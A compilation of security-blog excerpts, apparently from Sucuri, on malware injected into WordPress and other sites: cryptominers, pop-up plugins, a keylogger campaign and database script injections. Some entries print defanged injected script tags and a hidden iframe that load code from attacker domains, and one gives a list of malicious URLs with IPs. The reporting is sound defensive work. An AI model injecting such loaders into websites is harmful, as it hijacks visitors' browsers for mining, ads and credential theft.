Wikipedia Page Review Reveals Minr Malware

Since December, we’ve seen a number of websites with this funny looking obfuscated script injected at the very top of the HTML code (before the <html> tag). This code is generated by the well-known JJEncode obfuscator, which was once quite popular for encrypting malicious code. Since its popularity dwindled a few years ago, we’ve hardly seen any new malware using it. It was definitely a surprise for us when approximately 3 months ago we noticed the JJEncode obfuscator was once again in use: Minr cryptominer began using it to obfuscate scripts that they loaded from multiple domains like web.clodpw. Continue reading Wikipedia Page Review Reveals Minr Malware at Sucuri Blog.

Unwanted Pop-ups Caused by Injectbody/Injectscr Plugins

On February 8th, 2018, we noticed a new wave of WordPress infections involving two malicious plugins: injectbody and injectscr. These plugins inject obfuscated scripts, creating unwanted pop-ups/pop-unders. Whenever a visitor clicks anywhere on an infected web page, they are served questionable ads.

Plugin Location

The malicious plugins have a very similar file structure:

Injectbody: wp-content/plugins/injectbody/
  injectbody.php: 2146 bytes (the plugin code)
  inject.txt: 2006 bytes (injected JavaScript)

Injectscr: wp-content/plugins/injectscr/
  injectscr.php: 1319 bytes (the plugin code)
  inject.txt: 3906 bytes (injected JavaScript)

The functionality of these plugins is also very similar. Continue reading Unwanted Pop-ups Caused by Injectbody/Injectscr Plugins at Sucuri Blog.

Cloudflare[.]solutions Keylogger Returns on New Domains

A few months ago, we covered two injections related to the “cloudflare.solutions” malware: a CoinHive cryptominer hidden within fake Google Analytics and jQuery, and the WordPress keylogger from Cloudflaresolutions. This malware was originally identified by one of our analysts in April 2017 and has since evolved and spread to new domains.

Keylogger Spreads to New Domains

A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflaresolutions domain was taken down. Continue reading Cloudflaresolutions Keylogger Returns on New Domains at Sucuri Blog.

Malicious Website Cryptominers from GitHub. Part 2.

Recently we wrote about how GitHub/GitHub.io was used in attacks that injected cryptocurrency miners into compromised websites. Around the same time, we noticed another attack that also used GitHub for serving malicious code.

Encrypted CoinHive Miner in header.php

The following encrypted malware was found in the header.php file of the active WordPress theme: There are four lines of code in total. Each, when decoded, plays a different role.

CoinHive Injections

When decoded, the last two lines inject typical CoinHive cryptocurrency miners: The miner is only shown conditionally, so bots are excluded and only human visitors will receive it. Continue reading Malicious Website Cryptominers from GitHub. Part 2. at Sucuri Blog.

Malicious Cryptominers from GitHub

Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C infection had been found on his site. Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file: wpupdates.githubio/ping/" style="width:0;heigh:0;border:none;"> When we opened the URL in a browser, the page was blank. After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username MoneroU. Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.

Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites

A few weeks ago, we wrote about a massive WordPress infection that injected an obfuscated script pretending to be jQuery and Google Analytics. In reality, this script loaded a CoinHive cryptocurrency miner from a third-party server. We also mentioned a post written back in April that described the cloudflare.solutions malware, which came along with the cryptominers. At this moment, PublicWWW reports there are 5,482 sites infected with this malware. It seems that this evolving campaign is now adding keyloggers to the mix. Continue reading CloudflareSolutions Keylogger on Thousands of Infected WordPress Sites at Sucuri Blog.

Cryptominers on Hacked Sites – Part 2

Last month we wrote about how the emergence of website cryptocurrency miners resulted in hackers abusing the technology by injecting CoinHive miners into compromised sites without the consent of the website owners. We reviewed two types of infections that affected WordPress and Magento sites, and have been monitoring the malicious use of the CoinHive cryptominer. What we are discovering is that there are more and more attacks in the wild using cryptominers, and they affect all major CMS platforms. Continue reading Cryptominers on Hacked Sites – Part 2 at Sucuri Blog.

Hacked Websites Mine Cryptocurrencies

Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICOs, mining farms, skyrocketing exchange rates – you see or hear about these every day in the news now. Everyone seems to be trying to jump on this bandwagon. This trend has resulted in the emergence of online platforms that allow webmasters to install coin miners on their websites as an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for websites are JSE Coin and Coinhive. Continue reading Hacked Websites Mine Cryptocurrencies at Sucuri Blog.

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT’s Search and Replace scripts (searchreplacedb2.php). The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks. Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfreebiz/c.js'></script>

Or:

<s cript type="text/javascript">var t = document.createElement("script"); t.type = "text/javascript"; t.src = "hxxps://srcdancewithmebiz/src.js"; document.head.appendChild(t);</script>

Or:

The most noticeable malicious URLs that we’ve seen lately are:

con1.sometimesfreebiz/c.js (185.82.217.166, Bulgaria)
java.sometimesfreebiz/counter.js (185.82.217.166, Bulgaria)
javascript.sometimesfreebiz/script.js (185.82.217.166, Bulgaria)
js.givemealetterbiz/script.js (185.82.217.166, Bulgaria)
go.givemealetterbiz/click.html (185.82.217.166, Bulgaria)
traffictradelife/scripts.js (200.7.105.43, United Kingdom)
blue.traffictradelife/main.js (200.7.105.43, United Kingdom)
js.trysomethingneweu/analytics.js (94.156.144.19, Bulgaria)
get.simplefunsiteinfo/rw.js (won’t resolve at the moment)
post.simplefunsiteinfo/go.php?rewrite=81 (won’t resolve at the moment)
src.dancewithmebiz/src.js (185.159.82.2, Russia)
go.dancewithmebiz/red.php (185.159.82.2, Russia)

They are all new domains registered specifically for this attack:

traffictradelife – created on July 3rd, 2017
trysomethingneweu – created on August 11th, 2017
sometimesfreebiz – created on August 22nd, 2017
givemealetterbiz – created on August 27th, 2017
simplefunsite.info – created on September 2nd, 2017
dancewithmebiz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely...

Affiliate Cookie Stuffing in iFrames

Inline frames (iFrames) are an easy way to embed content from another site onto your own. This element allows you to insert another document inside an HTML page and can be really useful for embedding interactive applications like Google Maps, advertisements and ecommerce applications. iFrame elements are also popular with website attackers because they allow them to easily load malicious content from their own servers. Attackers often use this feature to insert malicious content into compromised sites for the purpose of spam redirection, phishing, and distributing malware. Continue reading Affiliate Cookie Stuffing in iFrames at Sucuri Blog.